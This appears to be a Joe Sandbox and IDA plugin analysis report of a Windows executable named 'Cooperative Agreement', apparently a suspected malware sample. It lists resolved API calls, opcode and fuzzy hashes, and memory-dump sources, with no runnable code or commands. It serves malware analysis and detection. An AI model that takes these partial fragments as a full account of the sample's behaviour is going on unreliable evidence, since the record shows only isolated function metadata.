                                                                                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                                                                                        • Opcode ID: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                                                                                                                                                                                                                        • Instruction ID: 1bee1f37f93e9d35684b03c2e4756e6010034fad4ed660fefd81427f3766245b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AB012702C43005AF2500B105C46B8039609304B43F304024B2015A1D4CBF0108045AC
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409B36
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DestroyHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2435110975-0
                                                                                                                                                                                                                                        • Opcode ID: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
                                                                                                                                                                                                                                        • Instruction ID: ab699811fd0d87702ef007ec9d9e0afa2980276031b74f33cf565c9ea9518c6e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 98900230404000CBCF015B10ED484843E71F74130532091749015414B0CB314451DA48
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
                                                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9
                                                                                                                                                                                                                                          • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                                          • Part of subcall function 00409C80: memcpy.MSVCRT(?,00000000,00000000,?,?,00402705,02399740,02399740,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000), ref: 00409C90
                                                                                                                                                                                                                                        • FreeResource.KERNEL32(?,02399740,02399740,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4216414443-0
                                                                                                                                                                                                                                        • Opcode ID: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
                                                                                                                                                                                                                                        • Instruction ID: a74944ffd3112f9905740440eb7f37d3abcacb2d1106573319e1e0e6d7d597bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13F07471818305AFDB01AF61DD0196EBEA2FB98304F01883EF484611B1DB769828AB5A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: D@A
                                                                                                                                                                                                                                        • API String ID: 0-2037432845
                                                                                                                                                                                                                                        • Opcode ID: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
                                                                                                                                                                                                                                        • Instruction ID: 1e0778d192f5f23141dad884ed32409d8a0e2e34130d822a75cbeb00c40a84ce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC428FB06047429FD714CF1AC58472ABBE1FF84304F148A3EE8589BB81D379E966CB95
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 004055BA
                                                                                                                                                                                                                                          • Part of subcall function 00405553: memset.MSVCRT ref: 00405562
                                                                                                                                                                                                                                          • Part of subcall function 00405553: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                                                                                                                                                                                                                                          • Part of subcall function 00405553: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                                                                                                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00405619
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Version$AddressHandleModuleProcmemset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3445250173-0
                                                                                                                                                                                                                                        • Opcode ID: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
                                                                                                                                                                                                                                        • Instruction ID: 9deb98d9ce9b1960b4761c85c685c0f6434d6ff4303ea967f2226934144b7de4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72311F36E04E6583D6308A188C507A32294E7417A0FDA0F37EDDDB72D0D67F8D45AE8A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(004098F0,0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008), ref: 00409A6C
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008,00000008), ref: 00409A80
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                        • Opcode ID: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
                                                                                                                                                                                                                                        • Instruction ID: 9241775fbeca2ef236d22ba042fa6dd18ecd55e37cf60d082ab63f5987e9b773
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFE0A571208315EFC310CF10D888A867AB4B748741F02C43EA02992262EB348949DF1D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memcpy.MSVCRT(?,?,00000040), ref: 0040B359
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                                                                                        • Opcode ID: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
                                                                                                                                                                                                                                        • Instruction ID: d2e712a387542d9911dc411e7765b1f2c08275ba07bac0dbf1d1b28710e8a60d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xAA
                                                                                                                                                                                                                                        • API String ID: 0-1293610936
                                                                                                                                                                                                                                        • Opcode ID: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
                                                                                                                                                                                                                                        • Instruction ID: 3e0955324bacc98d649988aae549d3f33f39a3fcf449ebb2edb4fadec9577cf0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF62AF71604B129FC718CF29C59066AB7E1FFC8304F144A3EE89597B80D778E919CB95
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: xAA
                                                                                                                                                                                                                                        • API String ID: 0-1293610936
                                                                                                                                                                                                                                        • Opcode ID: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
                                                                                                                                                                                                                                        • Instruction ID: 97b3e1327a1e87a4b46b26d767485ea51a150d14d874054969dc66b926ead844
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44050466ff59d092c84ade225eb2428a111c67205446c9fc6f6a12c7b28f2e65
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FD1E6716083818FC704DF28C49026ABBE2EFD9304F188A6EE9D587752D379D94ACB55
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409956
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                        • Opcode ID: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
                                                                                                                                                                                                                                        • Instruction ID: bc48fdad81fd92ebd0be0b19d5c8e3ba934b166e7abd4bc921d629b17d7e6aca
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf9cd527b89156cf826f8aca8c9aac0ae0f1dbb698b08308560a1dccda5bc85b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02B0017800422ADBDB019F10EC88BC83E72B749745F93C078E42981672EB79069EDA0C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                                                                                                                                                                                                                        • Instruction ID: f4dcce38d5e2b5fea8365ab6f66f10a9b642d7e6e28dacc25e9c3ad87e991d79
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a400b198c8088953b694fc09eb18952a69227507a418fb01e42f7223b2c6d58
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3512C5B3B546144BD70CCE1DCCA23A9B2D3AFD4218B0E853DB48AD3341FA7DD9198685
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
                                                                                                                                                                                                                                        • Instruction ID: fcc74630d9e7e7a990481c7c1f867b264d0775cdb04650b32c3420698d071277
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c460358eba1917bb56d4065ee02bd871fc6c6cc725e64d99fb649ce963d7fe5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE81E571620E52CBE718CF1DECD06B633A3E7C9320B49C638DA418779AC539E562D794
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
                                                                                                                                                                                                                                        • Instruction ID: 9051c99f30e4fd58257ce4a82e5c6de57c2f1ea08b849514de36b4a9f860707a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 513e02c80492a0d3023dc35d6953037e38dfbd2ea3f16a7153b47b8225a4960d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B571C3716205424BD724CF29FCD0A7633A2FBD9311B4BC73DDA4287296C238E962D694
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                                                                                                                                                                                                                        • Instruction ID: e7601879cae5e26ed9c4f46374459fbcb7982be31dee43e66e8e889727de3951
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 384105736147054BF728CA28C8607EB7390AFD4304F49493FD89A87382C6F9E8C68689
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                                                                                                                                                                                                                        • Instruction ID: c66b0092c88908efcb1f6d3c64bb4500893f1a226118266ab98ff54ab3bb9a2b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B631D7726547054BE728C928C8A57EB7390BF94344F49493FC88A87382C6F9E9C6C289
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                                                                                                                                                                                                                        • Instruction ID: 9975ed08cb8d88c562da0411d9d676463dde2a9787c448613e09b1fe69d496df
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0421C573754B054BE728896CC8953EB7390BFA4344F49493FC996873C1CAEAE9C5C284
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                                                                                                                                                                                                                                          • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                                                                                                                                                                                                                                          • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00408FB2
                                                                                                                                                                                                                                        • LoadIconW.USER32 ref: 00408FE9
                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                                                                                                                                                                                                                                        • RegisterClassExW.USER32 ref: 00409021
                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00409048
                                                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00409059
                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 00409091
                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 0040909E
                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                                                                                                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
